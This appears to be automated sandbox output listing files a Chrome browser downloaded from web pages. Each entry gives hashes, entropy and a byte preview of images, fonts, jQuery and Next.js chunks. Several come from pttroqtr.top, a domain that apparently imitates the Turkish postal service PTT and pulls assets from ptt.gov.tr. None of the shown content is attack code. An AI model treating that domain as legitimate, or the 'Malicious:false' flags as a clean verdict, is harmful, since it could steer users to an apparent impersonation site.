                                                                                                                                                                                            Preview:.PNG........IHDR.....................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..r(IDATx...Mv.G....w.9d.(+..z......8+.Y...0+@.=..1.4.."V...}..KA8...+u.u.S.......j....7..+.................P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 16692, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16692
                                                                                                                                                                                            Entropy (8bit):7.987238779938359
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:JJlRJsN3EMLFZ1UNJ1rDtEZftwezFOAO54hzpr:JJzuN3nK13te+ezFON2N
                                                                                                                                                                                            MD5:D65113B6DA7BA4BD0A59DBDA5A7E24D4
                                                                                                                                                                                            SHA1:929ECF3AD6AB03123A7BAD0609B4B8BA1623D4E8
                                                                                                                                                                                            SHA-256:CCE577471C2586F3E0C2518FFF84A970D33F61491FB8C629341B86F238CF07C0
                                                                                                                                                                                            SHA-512:70E39E0EA11ED0C9C6B75CB8240760EB681CC53570146246918A222489A41C85BE898557CF1E5805A87C5155EE01F8B1E5EC480A1FABD742E44A30381C44E8FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/opensans/v28/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVI.woff2
                                                                                                                                                                                            Preview:wOF2......A4......{...@..........................b. ..P.`?STAT^.....|...........z.....6.$..8. ..x. .....k..6........6..6.`.<4.... e.l..).8'(.I....B...u..RW$...fF....q.j...K....6.<...>zS..k...F.;f.G..=.Y.KP.(.....3K.w.#.3'[n..(..4....#..cv.....s0......<.....9.y.J...v%.....lS..sF......@...VT.+P.........#gm.......H..FH3..~..h...tB..l.c.;...6D.Z#uB..........x_.n.h%?..I.......e........(..*....E[%C.:.....h.... .]]d...Y.d...~.N.N`x......a.I.#$%.t..lr....L..E..............7.op.1..SM...${g..V~.S?.+.?...*1`...TP.@..-^8.4..Z}_I*\.N.......>%...-.0.>...T...b.d.#..H^.C.....u..v..g..3.%.KHB ...... )..}G.. u).!g...)Q.H....+UNU*.wn]......sHE..w..y..{'5.j\U...3...=...,.0....bAS.=^..WCw.:.J....g..wZ... .\F"(u..s.Ze:.....;B[...P.:Ek...BWp<.0.R..5...5..............S'.t..6....q..~...SlY/.;.!e.z.-......9\&M.\.m..R....(F...B.m..N.r5.[2...E.z..m{...u......BoQ...d.CG7.|.Z.5B*.`..%uM....).d.=.4..S.........R.,..y4.....E...Z.6.&..f..*.x..^.f6.S.0.lG4Lw..?..n.......f....AL
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):27613
                                                                                                                                                                                            Entropy (8bit):7.9067114058135255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:mP841dvgbsFJpwSBB0mFot1XFEUmf0Hl+009q+v+k60IOfsewcKQTaY1:mU41OQFJpZfot1+Umf08j+ROkeEK1
                                                                                                                                                                                            MD5:42783A8A7A54514AC07F633D0828C7A2
                                                                                                                                                                                            SHA1:2E6C33B957D0425C21EDE292563336688557BCC2
                                                                                                                                                                                            SHA-256:5EC2E2250A6985E5E16C04978FAD8783F0B58D4DC73D9E19E70A7B59CE8CFD77
                                                                                                                                                                                            SHA-512:8DC87B91FAE087E7716EE6E4685A6507AA66802E9B1CFE1874A20D0C5537F9B28D6DEE84572EF5A3592EA0E7B8C93A3E122445C15ABF593481D36C94587C1CEA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/48.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..kjIDATx...Mv.K.p..y.....5.[.)...G`<......x..#0...#pi.F.e..F.\...A*.......K6...*.........9....8-.B......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@......8....@............$...........$......8....$......8....@......8....@...........@............$......8....$......8....@......8....@...........@............$......C......8....@...........@............$...........$......8....$......8....@...........@............$...........$......8....$......8....@...r../...........5.....8......z|...c.(k.yMO...n.5.`[......w....-..H..@uA...`..S....p]G.~.....F..[.5...D."..T.'V..us....wK... q...M.J.h.......,..x...H^..:.....I.m....J...[..2.>j..?..w.>&... q.....O.>..T_'..!....E[......J.EL...3.ysY.5oe.6"q.X.>b...........$..NA.n...D`l.M~.+g.6.&B.%.(YI...H.f.5g;..~a...~........ q..E........{.z\.".yB.v.G.j...2"...5..h.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (11524)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11574
                                                                                                                                                                                            Entropy (8bit):5.332302381529318
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:7v+CNp6/anNwCPXjBobJHnycoYIWx6T334MjbxN5AZOva/rL6twJwg1uvbqXGA6g:7rfManGCPXjSJmxg09bxHAYvun3DX20j
                                                                                                                                                                                            MD5:DAC5D6A1FCFC7602CA1135B80C4AEAC7
                                                                                                                                                                                            SHA1:85A3FB6333CF317B57F44A327BE09E31590D5912
                                                                                                                                                                                            SHA-256:E1B2B0D74DCF5FA0839F03D26D57EA6CF629004C0707755B8B70E51EEC14AD23
                                                                                                                                                                                            SHA-512:C3EBA50A7AD6212686D13A581FF58B68B915280234445293D2A085AC6C0480861065517AAF290CF46EF81BF8ABE255D2FE9009EF23BDA33894A8692E1284EBE9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/4412-8214ad20a138381f.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4412],{8953:function(e,t,n){"use strict";var r=n(8565),a=n.n(r),s=n(3288),u=n(2267),c=n.n(u),o=n(2466),i=n(6731),l=n.n(i),f=n(3395),p=n(3230),v=n(8082),h=n(2493),d=n.n(h),y=n(1295),_=n(427),m=n(1270),w=n(1395);function g(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function x(e,t,n,r,a,s,u){try{var c=e[s](u),o=c.value}catch(i){return void n(i)}c.done?t(o):Promise.resolve(o).then(r,a)}function T(e){return function(){var t=this,n=arguments;return new Promise((function(r,a){var s=e.apply(t,n);function u(e){x(s,r,a,u,c,"next",e)}function c(e){x(s,r,a,u,c,"throw",e)}u(void 0)}))}}function b(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var r,a,s=[],u=!0,c=!1;try{for(n=n.call(e);!(u=(r=n.next()).done)&&(s.push(r.value),!t||s.length!==t);u=!0);}catch(o){c=!0,a=o}final
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 1772 x 945, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):29339
                                                                                                                                                                                            Entropy (8bit):7.356325846196763
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:L/VTX6DKxDUWnEooJ+NMvlF+Dir+WEtOaUfw4LBQbbr3NwPHpK7AGW3T6CmPDwD:L/kDCJ1y7UU+WwDUfkbLOpGnPUD
                                                                                                                                                                                            MD5:AEBDDA95DC8CFFFEE118C2F7CDF158DC
                                                                                                                                                                                            SHA1:FD547F5F7DE14D0F8E234B6AAF21CE10C81976A1
                                                                                                                                                                                            SHA-256:CDABE7A61B3729FECD8DDFC82EB2BEAF3EE622FCD58B1774E39926DADA88880B
                                                                                                                                                                                            SHA-512:39AE9C324315EC8DBE3A080909E6AB8EF7019D0C36AEF4F418DC9905839BB684AD5A5A1A05C8BE820165522EBB07D7FF8C6CF8326FA8905DC1620B92947313DE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.....................pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..r(IDATx...Mv.G....w.9d.(+..z......8+.Y...0+@.=..1.4.."V...}..KA8...+u.u.S.......j....7..+.................P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(H`................. .........$..........v......P..................@A.;......(
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32023)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):83612
                                                                                                                                                                                            Entropy (8bit):5.277084099045577
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:knWi6p4BmVLFijGb2gXke71t5tgPBHlxNLIJBanUEwf7rmvsMn3lhMr:0UL5uxNL/4Cr3lOr
                                                                                                                                                                                            MD5:0A6E846B954E345951E710CD6CE3440E
                                                                                                                                                                                            SHA1:FBF9C77D0C4E3C34A485980C1E5316B6212160C8
                                                                                                                                                                                            SHA-256:B13CB5989E08FCB02314209D101E1102F3D299109BDC253B62AA1DA21C9E38BA
                                                                                                                                                                                            SHA-512:14653AADEB13635FF6F108137200DE430033050660B6F33B36DD15E92C10D1042FABCC8D08836374769AA8B2FE080DCDF038B8145D803F40167F54D8825AA321
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/jquery-2.0.3.min.js
                                                                                                                                                                                            Preview:/*! jQuery v2.0.3 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery-2.0.3.min.map.*/.(function(e,undefined){var t,n,r=typeof undefined,i=e.location,o=e.document,s=o.documentElement,a=e.jQuery,u=e.$,l={},c=[],p="2.0.3",f=c.concat,h=c.push,d=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,x=function(e,n){return new x.fn.init(e,n,t)},b=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^-ms-/,N=/-([\da-z])/gi,E=function(e,t){return t.toUpperCase()},S=function(){o.removeEventListener("DOMContentLoaded",S,!1),e.removeEventListener("load",S,!1),x.ready()};x.fn=x.prototype={jquery:p,constructor:x,init:function(e,t,n){var r,i;if(!e)return this;if("string"==typeof e){if(r="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:T.exec(e),!r||!r[1]&&t)return!t||t.jquery?(t||n).find(e):this.constructor(t).find(e);if(r[1]){if(t=t instanceof x?t[0]:t,x.me
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 2256 x 870, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):68762
                                                                                                                                                                                            Entropy (8bit):7.71915786162258
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:rngMJBc2rGBNTitP9UVe6NdNXdhEr7Fv8p3Q3eWm:EmtrGbTKuD9Xda7yp3Iel
                                                                                                                                                                                            MD5:C61C112D676A67063CD88EAB7CCD45C0
                                                                                                                                                                                            SHA1:C242C80410CDA356C2DE2D4E0D23E854CC4DACBD
                                                                                                                                                                                            SHA-256:AC2B764B80CF484BDFC9BECBE35E90C2FFF150BBAE34DC45532C0C74A293EFF4
                                                                                                                                                                                            SHA-512:0200342B2A4E4484EDA42EC36BBBBB21E678322AAB9015CFEB54A41888F3AA6AD71423F9228CBCC1FD4155453E1BBDF5788F94CA8D78E33AFCCE400681FEE906
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/32.png
                                                                                                                                                                                            Preview:.PNG........IHDR.......f.....1.......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96" xmpMM:DocumentID="xmp.did:66A006C7B8FE11E488B09FFF33422EA0" xmpMM:InstanceID="xmp.iid:66A006C6B8FE11E488B09FFF33422EA0" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2B90E4DDBAB7E4118702D694C2DD9BC9" stRef:documentID="xmp.did:C717A9C144ADE311B375B81E1EEB5B96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>%..u....IDATx.....\gy6.w.$..d,l.M.M...M.....!..0.B
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10746
                                                                                                                                                                                            Entropy (8bit):7.750448157439093
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:pJ1sotcNTjukglXJd9p+d8Vn1LoujKwt/z318b+jJSrQPMnDQ4bM21yepESh:27VglXvnWu1Muj5p34+GnTT1yfg
                                                                                                                                                                                            MD5:B46BD38DC53B5A97A9F2E48539B34446
                                                                                                                                                                                            SHA1:D839AB9090F1011145FDB4AFB9F4B1E2ECCC6AA8
                                                                                                                                                                                            SHA-256:210BBA6C4F4B3D5C3F44664310E2F32595EE8859A6051396B6FFCD90FC3B167A
                                                                                                                                                                                            SHA-512:0B5A369BA21CC6607547D93B2E53AD7BE77999436B5E6A991D48AC4496A72606E475CB7979181695ACA126E18F28E4373C6DFE383710785D88B14420CA8B2AA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..).IDATx...=v.V..`L.w.VV`.r)M......S.^....^A........S..H...+......q..~.s/.R.s..L..A..x..?.}.V...Y~r....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........'...D..}..o...A...x.e.d<l....n.....q......J...?Cyl..T.N......5yQ.U.[y...Y....L.q.UpL..~*__..,4.N..o..w_..Gvhg.+T2.C{Q...@.g'..p.......uT......Q..k.c'..p....p...........r...ce3B...$...:......j.;ur.>......c.>..hM..n.0 }....d...[
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4005)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4436
                                                                                                                                                                                            Entropy (8bit):5.598657081005046
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:n/EKhN5jG91m+Lu1ur64EJD0l3cyvp9n1iI+ZM67IB+RvUCFa:/EKhK91mkUX4EJD8r9nUL7IB+RcQa
                                                                                                                                                                                            MD5:D940AFE8635CC3409F9E3AE7EA0518CD
                                                                                                                                                                                            SHA1:4DF3E545964A46C46A204E2B072C7FCF4BC2FA7B
                                                                                                                                                                                            SHA-256:49D6396A823560D47584B60E9A88A2374F87A02626F8ED2DBCFAC29885651197
                                                                                                                                                                                            SHA-512:B21A7807DB9FACD47DF2A2629E15EB127022F0107FC651C13578505E5737BB64D1F2D8C85135730879EC739838049AFEB42DD21CFB13B8A27FEE4AF5F137B79B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:var acjsLanguagesList={"af":"Afrikaans","sq":"Albanian - shqip","am":"Amharic - ....","ar":"Arabic - .......","an":"Aragonese - aragon.s","hy":"Armenian - .......","ast":"Asturian - asturianu","az":"Azerbaijani - az.rbaycan dili","eu":"Basque - euskara","be":"Belarusian - ..........","bn":"Bengali - .....","bs":"Bosnian - bosanski","br":"Breton - brezhoneg","bg":"Bulgarian - .........","ca":"Catalan - catal.","ckb":"Central Kurdish - ..... (........ ......)","zh":"Chinese - ..","zh-HK":"Chinese (Hong Kong) - ......","zh-CN":"Chinese (Simplified) - ......","zh-TW":"Chinese (Traditional) - ......","co":"Corsican","hr":"Croatian - hrvatski","cs":"Czech - .e.tina","da":"Danish - dansk","nl":"Dutch - Nederlands","en":"English","en-AU":"English (Australia)","en-CA":"English (Canada)","en-IN":"English (India)","en-NZ":"English (New Zealand)","en-ZA":"English (South Africa)","en-G
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):96
                                                                                                                                                                                            Entropy (8bit):4.801770503303253
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:k0WYL12AdneHBeBW6QfpX/W6Qen:UYR2AdeHBf6EpXO6h
                                                                                                                                                                                            MD5:21C1349F80499EC49848EA61EDFCC3AB
                                                                                                                                                                                            SHA1:CED7488DB5B6CF88DACE2E0AE2C668C0B2D4ACE2
                                                                                                                                                                                            SHA-256:A0676D8033F5A45F08B37BB7EA756D48C584DF74246E167DBDF5D020B2A0B4B1
                                                                                                                                                                                            SHA-512:625427E44A07B5FB3FE892A2CD8F2B78303D25BDC5581049FE71B1BDE19DF2C46DCF39176AE634FF6FF1A04061601817A872DA122997FD3F048D335EE0448808
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/3nPo4dxLHf5a0RshtsAsa/_ssgManifest.js
                                                                                                                                                                                            Preview:self.__SSG_MANIFEST=new Set(["\u002Fnotfound"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjfG8&sid=DijwWc-tALPoXXo3AEf9
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11236
                                                                                                                                                                                            Entropy (8bit):7.810773514354199
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:kMT1s9HGoPMx5pkNj2lCMRzf9vtAfvdaVyQkVdabDaV2QqgOr/NE6kMy52E+lgBK:r1OHw3pm2lCacvdaDk6CcWOYMy5D+GBK
                                                                                                                                                                                            MD5:B2CB0F3916850DCD4056B9D6336FD78A
                                                                                                                                                                                            SHA1:76F040631FE153456638BC65E459A184DE09FE53
                                                                                                                                                                                            SHA-256:C947614A8D15810CF1B6768C16458C002E3D65640BF2B415BC1E23DA049CBEFD
                                                                                                                                                                                            SHA-512:A9FA0D82D0E753F3BD767568B3D6EF135F41C9D919C5361F5CA69BE157B76E7CE9473355397CD0E92157E7A338D06B35D08AF4BF21B045B0BAEDB2D22A33CD5B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..+qIDATx....u...`T.;.;.."..'.#.j.C..X....J.....J...IO-GPt....-m\.Tz.........!. ...8....^...[~.....8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@.....8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@................8...8...8..!...!...!...!..@...@...@...........[7..}..?b{Zo.-..[.].?|...#)......-.....|..E..K.N.....m...v%.]...P'.......z.T.k.J..@w.[....8.8...4C.P..C....L........_.Y.......3.....`/...1...=.xQ;7.@W...o[....m....fN...].o.lz~@.m.U~.saN...].o1`aZo....>sgu..p(.8..r..iBf........6Q+'..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):11518
                                                                                                                                                                                            Entropy (8bit):7.966291743818182
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:+WG04lslf+6LDQ0v2M635Hz0xvFzzahp0y4BTHzWnMDfjVO/IwlQmn3C3WbQ1R:+Ef+I0i2T1zgzaXXWCqsQmny3WbO
                                                                                                                                                                                            MD5:2CC5743A1A8F6BC6384F081849BAC3FD
                                                                                                                                                                                            SHA1:70E5ED0109BCA40261543210C5A178C7FFC29633
                                                                                                                                                                                            SHA-256:7AC38EAC2CC2002FEBE7613E3DF10786A9BB95AB401C4D8EAE3D0319551AF8A2
                                                                                                                                                                                            SHA-512:8FA2808DEAD785B6B387151F1BE53A70E3AA8F53BAEA3B3E24D2791D2EBF10478E0441B2190BD49907113B26632CAD854EED28118CB368087980A264AD2613E3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75
                                                                                                                                                                                            Preview:RIFF.,..WEBPVP8X...........5..ALPH.%....C @...?........j.M;.Cf. Q"...9.J.&.g.....8..W<........}.D...._....?5...hk..w.....l..p..U..P....z_>k.S.[U-......m..Zuk..`n.z.V&.j......}=.b........x..".%..:P}F*Jr.E..I...u.PqK.m.....t........ .=/&..V%.....*.y<?X.....<n..39..I..t.6......w^,t..l.r..A.N......$...tu.......@MQ.s* ....KX.jWIf?....S......A.m.....6.....l.c.)..H.>.M.\....=...UoYI2.1.Z..=g>!.d.,(kr.-.&..3aa.np......4lWy'.U.....>...X....rp...DwCI.U..C..P... ,...I.+...v.>t7V.T..O.V..s/.CPD/..W.V$W..|.xv7u..S$...1....<..........l......y.t1._.......jO\h5G.6..2..N.t7....}...s..<y...o.]m.:..T..*..Z._....'.......f....J..<G:{..'....d1...q.m..6.1/..q._.....'+..K>]6[........V.gW...yZ^H.8Z.B.Z.......8_.B.Z ...|.S......P...+.f......G.,.....|yUS.._..P....5.^^....X(]..e[.{ZT.....P....^L.X....G...s..%.Y.....y. H2..-...X(Y.f.1.n.[. \..g...{....v...*...S;..If......D.....d..].. \.........Q.N......;..I.3...."..d.]'{u........6.w.p"....x.:.......[.$..pm.D..B.n
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows icon resource - 1 icon, 32x19, 32 bits/pixel
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2570
                                                                                                                                                                                            Entropy (8bit):3.527155255496045
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:06baFI5vY0u68gsGOLynrZFTWxBtwJGwPBheAuaAxI4l60O+9DL:0h8vo6jZOsrZFyEJGwPBh7uve4llOwP
                                                                                                                                                                                            MD5:14EE76D740C6D351E447C37B1A9DDB37
                                                                                                                                                                                            SHA1:CDD7D04160D5624C219CCB8FD2D4F557D77DB99B
                                                                                                                                                                                            SHA-256:32EF97D69F5188DF3EB8BCA51E02A151FFB615E21FA0E4EABFA884CDD4DB0485
                                                                                                                                                                                            SHA-512:66945FA193F2E3B94A35FC4C5AA6F19321B3F832BB0491B70A1787C12CB6B5A25E7D591D9FE33827883934A3DB3808BDDC64898B16ED824244AA15EE86351817
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...... ..... .........(... ...&..... .........#...#.................................................$..V..r..`..5..............?..Z..d..Z..=..........................................................T........p..,........ ..f.............................1.......................................r........w..........."..............E.................A........|............................f...........(...........\........s................................W......................../...........].......................5......................................e...A...Y.................Q...........7.......................&..............................................&..............t.....q...........0..............y........:.................................................!...O......8........,.................:........A....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format, TrueType, length 63712, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):63712
                                                                                                                                                                                            Entropy (8bit):7.991584066717122
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:1536:6r3aBF+fpuQfwBx/Qyz72z/liawnC4HcIzpnvQ3PXg:IKBAfp4/QyzSz/RwC4b8I
                                                                                                                                                                                            MD5:AC327C4DB6284EF64EBE872B6308F5DA
                                                                                                                                                                                            SHA1:7DD17593D3947F4EA10BE937634EF8F553443E5A
                                                                                                                                                                                            SHA-256:2E1587380141DAFF4E10A8E3DB8F7AE5887102AB7576BFF43049590F637AC20B
                                                                                                                                                                                            SHA-512:8DA7EC2B5617B1ECF2699573FEE9A43B8CCB111BA12B22E35CD0621C85377890675D3FFBBBF11AAA828F9D00302DE06CB1680B750370571C80DAAEC65BE36A8B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/2e158738kFGym.woff
                                                                                                                                                                                            Preview:wOFF........................................FFTM............].F~GDEF........... ....GPOS....... ... l.t.GSUB............H...OS/2......._...`.6..cmap......."...~.*..cvt ...4...D...D...Jfpgm...x.......e../.gasp...,............glyf...4......Z.h9K.head.......3...6.|.Phhea...D...!...$...}hmtx...h...9.....R>.loca......3...dw..maxp....... ... ....name............%8@Qpost...........p..$Kprep...........|.`.,.........o1.....51.........x.c`d``..b...`b..7.I.0.....................latn................x.]RMk.Q.=oN.4..@....qQ.(.*d..R.L.)]...L.e&F.~jm......~.U.M.K....R. ""...Bz..(.s..~.;.....|.rK~....;..H_v.@......6..FDTQ.../b...J.w..q\r+W].V.=tC.Wr}.=.|.F./.,x....wL.V...vA...6s.._..O.a..].F/2.....F1...<....?..-...7.>l.J...JI..B|.w|.m.H<.A|.>..U..Hp....4g8...9..<....|.G|.g|....@.....x....'~.7...y.....5a5.?..sE.+..i..\.:7..W|.7...Z\. )J.:.[..d.....M]K..=.G.....E\....$N.x.H....O..P...g.......9.y[f..a.p..$.aU0G_0k&....`..x.c`f9.8.....u..1...<.f....................{...h.... f0
